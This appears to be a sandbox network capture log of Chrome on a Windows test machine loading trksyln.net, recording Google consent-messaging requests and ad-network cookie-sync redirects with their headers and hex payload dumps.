2024-10-31 18:19:36 UTC	484	IN	HTTP/1.1 302 Found p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' cache-control: no-transform, no-cache location: https://cm.g.doubleclick.net/pixel?google_nid=one_tag&google_hm=&google_push=AXcoOmSBEqLcMQ1_a7fW7NcT2Iei-MG31IkeZEJ4zsIXZrw5PAIP7aNgsrC8sU8h46pHu40uiZnbXPrhr6kfd4hGeSk-YKS5ry9iw6eT content-length: 0 strict-transport-security: max-age=15552000 alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49914	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	845	OUT	POST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive Content-Length: 150 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	150	OUT	Data Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 33 39 38 32 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 31 2c 31 30 30 2c 22 74 72 6b 73 79 6c 6e 2e 6e 65 74 22 2c 22 74 72 6b 73 79 6c 6e 2e 6e 65 74 22 2c 33 5d 5d 5d Data Ascii: [null,null,null,null,null,null,null,null,1730398773982,null,null,null,null,null,null,null,null,null,null,null,[[1,100,"trksyln.net","trksyln.net",3]]]
2024-10-31 18:19:36 UTC	1861	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=utf-8 Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Origin: https://trksyln.net Access-Control-Allow-Credentials: true Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:36 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-i0FJ7K9ySqKYT9Htm906nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmII1JBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4ubYMaV_J5tAx789PEouSfmF8cn5eSWpeSW6iSnFuiB2UWZSaUl-EQo7tQykIic_PT0zLz3eyMDIxNDA2EDPwDi-wAAA8NMoFg" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49920	54.170.20.205	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:36 UTC	814	OUT	GET /cookie-sync/adx?google_gid=CAESENLpOVFDHsC-VfNLaLRul-w&google_cver=1&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5&_bee_ppp=1 HTTP/1.1 Host: match.prod.bidr.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: checkForPermission=ok
2024-10-31 18:19:36 UTC	846	IN	HTTP/1.1 303 See Other Date: Thu, 31 Oct 2024 18:19:36 GMT location: https://cm.g.doubleclick.net/pixel?google_nid=beeswaxio&google_sc=&google_hm=QUFENkJVN09SNVFBQUJXb1Z0Yi1odw&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5&bee_sync_partners=&bee_sync_current_partner=adx&bee_sync_hop_count=1 Server: gunicorn set-cookie: bito=AAD6BU7OR5QAABWoVtb-hw; Domain=bidr.io; expires=Sun, 30 Nov 2025 14:19:36 GMT; Path=/; SameSite=None; Secure set-cookie: bitoIsSecure=ok; Domain=bidr.io; expires=Sun, 30 Nov 2025 14:19:36 GMT; Path=/; SameSite=None; Secure set-cookie: checkForPermission=""; Domain=bidr.io; expires=Thu, 01 May 2008 00:00:00 GMT; Path=/; SameSite=None; Secure strict-transport-security: max-age=2592000; includeSubDomains Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49923	35.71.131.137	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:36 UTC	862	OUT	GET /track/cmb/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E HTTP/1.1 Host: match.adsrvr.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: TDID=d1b817e5-56c5-45f4-864e-634d6431975b; TDCPM=CAEYBSgCMgsI-O_s4-n4vD0QBTgB
2024-10-31 18:19:36 UTC	643	IN	HTTP/1.1 302 Found Date: Thu, 31 Oct 2024 18:19:36 GMT Content-Length: 423 Connection: close server: Kestrel location: https://cm.g.doubleclick.net/pixel?google_nid=TheTradeDesk&google_hm=ZDFiODE3ZTUtNTZjNS00NWY0LTg2NGUtNjM0ZDY0MzE5NzVi&google_push&gdpr=0&gdpr_consent=&ttd_tdid=d1b817e5-56c5-45f4-864e-634d6431975b set-cookie: TDID=d1b817e5-56c5-45f4-864e-634d6431975b; expires=Fri, 31 Oct 2025 18:19:36 GMT; domain=.adsrvr.org; path=/; secure; samesite=none set-cookie: TDCPM=CAESFQoGZ29vZ2xlEgsIpMeLwNP4vD0QBRgFIAEoAjILCPjv7OPp-Lw9EAU4AQ..; expires=Fri, 31 Oct 2025 18:19:36 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
2024-10-31 18:19:36 UTC	423	IN	Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 54 68 65 54 72 61 64 65 44 65 73 6b 26 67 6f 6f 67 6c 65 5f 68 6d 3d 5a 44 46 69 4f 44 45 33 5a 54 55 74 4e 54 5a 6a 4e 53 30 30 4e 57 59 30 4c 54 67 32 4e 47 55 74 4e 6a 4d 30 5a 44 59 30 4d 7a 45 35 4e 7a 56 69 26 67 6f 6f 67 6c 65 5f 70 75 73 68 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 26 74 74 64 5f 74 64 69 64 3d 64 31 62 38 31 37 65 35 2d 35 36 63 35 2d 34 35 66 34 2d 38 36 34 65 2d 36 33 34 64 36 34 33 31 39 37 35 62 22 3e 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 Data Ascii: Redirecting to: <a href="https://cm.g.doubleclick.net/pixel?google_nid=TheTradeDesk&google_hm=ZDFiODE3ZTUtNTZjNS00NWY0LTg2NGUtNjM0ZDY0MzE5NzVi&google_push&gdpr=0&gdpr_consent=&ttd_tdid=d1b817e5-56c5-45f4-864e-634d6431975b">https://cm.g.doubleclick.net/pix

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49924	74.119.117.16	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:36 UTC	914	OUT	GET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1 Host: widget.us.criteo.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:36 UTC	441	IN	HTTP/1.1 200 OK content-type: image/gif date: Thu, 31 Oct 2024 18:19:36 GMT server: Kestrel cache-control: no-cache expires: Thu, 31 Oct 2024 00:00:00 GMT pragma: no-cache transfer-encoding: chunked x-errorlevel: 0 p3p: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA" cross-origin-resource-policy: cross-origin server-processing-duration-in-ticks: 267563 strict-transport-security: max-age=31536000; preload; connection: close
2024-10-31 18:19:36 UTC	49	IN	Data Raw: 32 42 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a Data Ascii: 2BGIF89a!,D;
2024-10-31 18:19:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49925	54.170.20.205	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:36 UTC	818	OUT	GET /cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&_bee_ppp=1 HTTP/1.1 Host: match.prod.bidr.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: checkForPermission=ok
2024-10-31 18:19:37 UTC	850	IN	HTTP/1.1 303 See Other Date: Thu, 31 Oct 2024 18:19:36 GMT location: https://cm.g.doubleclick.net/pixel?google_nid=beeswaxio&google_sc=&google_hm=QUFDOUVFN09SNVFBQUJRUkRLV1VFdw&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&bee_sync_partners=&bee_sync_current_partner=adx&bee_sync_hop_count=1 Server: gunicorn set-cookie: bito=AAC9EE7OR5QAABQRDKWUEw; Domain=bidr.io; expires=Sun, 30 Nov 2025 14:19:36 GMT; Path=/; SameSite=None; Secure set-cookie: bitoIsSecure=ok; Domain=bidr.io; expires=Sun, 30 Nov 2025 14:19:36 GMT; Path=/; SameSite=None; Secure set-cookie: checkForPermission=""; Domain=bidr.io; expires=Thu, 01 May 2008 00:00:00 GMT; Path=/; SameSite=None; Secure strict-transport-security: max-age=2592000; includeSubDomains Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49937	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:37 UTC	1145	OUT	GET /f/AGSKWxUB99RlJ_8i7LLI3oNTdMLmCw2CQVqckIxJK9gf-02-WMpmqGqaY-w86Dc5gRTrOlzGhRgGU2qqZ_W1MTy0YY21viTL3rQc18HIx6JgnCbhVFUEjsqMaMITOmSLmaXPdGl8WFcYzw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4Nzc1LDY4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNSw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXSxbMTgsIltbWzFdXV0iXSxbMiwiW251bGwsW251bGwsMSxbMTczMDM5ODc3NCwyNjUzNTkwMDBdXV0iXV1d HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:37 UTC	1942	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:37 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-9MC55qp2rULSZnyO8eSN_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Cross-Origin-Resource-Policy: cross-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytHikmLw0ZBiWMS_i0ni60smLSB2Sp_BGgLErTfPsU4H4qR_51lLgNhd6yKrPxAbKlxidQZix6JLrJ5ArNpzidUciO-vu8T6HIiLJK6wtgDx7aYrrI-BmOHrFVYOIBbi4dg5pX8nm8CL1nfzGJU0kvIL45Pz80qKMpNKS_KL0pLTUotTi8pSi-KNDIxMDA2MDfQMDOILDABpgUFY" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:37 UTC	1942	IN	Data Raw: 64 33 62 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 4e 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 4e 6f 2c 5f 2e Data Ascii: d3bif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{var No=function(a){this.l=_.t(a)};_.v(No,_.
2024-10-31 18:19:37 UTC	1452	IN	Data Raw: 35 75 69 37 65 61 55 49 33 39 6b 6a 55 76 51 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 6e 75 6c 6c 2c 5c 78 35 62 5c 78 35 62 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 78 32 32 68 74 74 70 73 3a 5c 2f 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 58 77 37 4a 77 55 42 34 70 37 68 42 48 32 42 4c 5f 72 75 6f 36 78 78 6d 53 76 45 6c 2d 31 5a 6d 38 42 76 30 31 33 78 50 68 74 76 72 66 4c 32 57 38 2d 5f 55 30 72 6d 57 4b 69 30 36 65 6a 31 50 38 36 59 7a 43 44 76 39 61 77 63 32 5f 64 64 48 54 2d 53 4a 50 6e 5a 48 63 4e 67 33 31 50 6b 6e 4d 72 4b 5a 6d 52 58 58 38 65 65 43 36 46 47 79 54 7a 42 33 2d 7a 75 52 2d 70 75 Data Ascii: 5ui7eaUI39kjUvQ\\\\u003d\\\\u003d\\\x22\x5d,null,\x5b\x5bnull,null,null,\\\x22https:\/\/fundingchoicesmessages.google.com\/f\/AGSKWxXw7JwUB4p7hBH2BL_ruo6xxmSvEl-1Zm8Bv013xPhtvrfL2W8-_U0rmWKi06ej1P86YzCDv9awc2_ddHT-SJPnZHcNg31PknMrKZmRXX8eeC6FGyTzB3-zuR-pu
2024-10-31 18:19:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49955	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:38 UTC	845	OUT	POST /el/AGSKWxWjHabnSuL9B4VxegZWyCa9ZWTSIsOp_ZY9ZoJkDPE9Ujj3y2AZV0SUbX7NBP62pLon8MtTt3yiG7oPyyfx_mdT0EtP7qmFOrtM3pz2NbBkYKcNRaLSg5Ln_f5cPEZs9JBBIQd-Cg== HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive Content-Length: 150 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:38 UTC	150	OUT	Data Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 36 39 37 35 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 31 2c 32 37 36 2c 22 74 72 6b 73 79 6c 6e 2e 6e 65 74 22 2c 22 74 72 6b 73 79 6c 6e 2e 6e 65 74 22 2c 33 5d 5d 5d Data Ascii: [null,null,null,null,null,null,null,null,1730398776975,null,null,null,null,null,null,null,null,null,null,null,[[1,276,"trksyln.net","trksyln.net",3]]]
2024-10-31 18:19:38 UTC	1862	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=utf-8 Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Origin: https://trksyln.net Access-Control-Allow-Credentials: true Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:38 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-KvaqgPzydx4aZ3EDLyGZWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmJw05BicEqfwRoCxO5aF1n9gZjh6xVWDiAW4uHYNaV_J5vAip1rlzApuSTlF8Yn5-eVpOaV6CamFOuC2EWZSaUl-UUo7NQykIqc_PT0zLz0eCMDIxNDA2MDPQPj-AIDABh9KHQ" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49956	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:38 UTC	845	OUT	POST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive Content-Length: 160 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
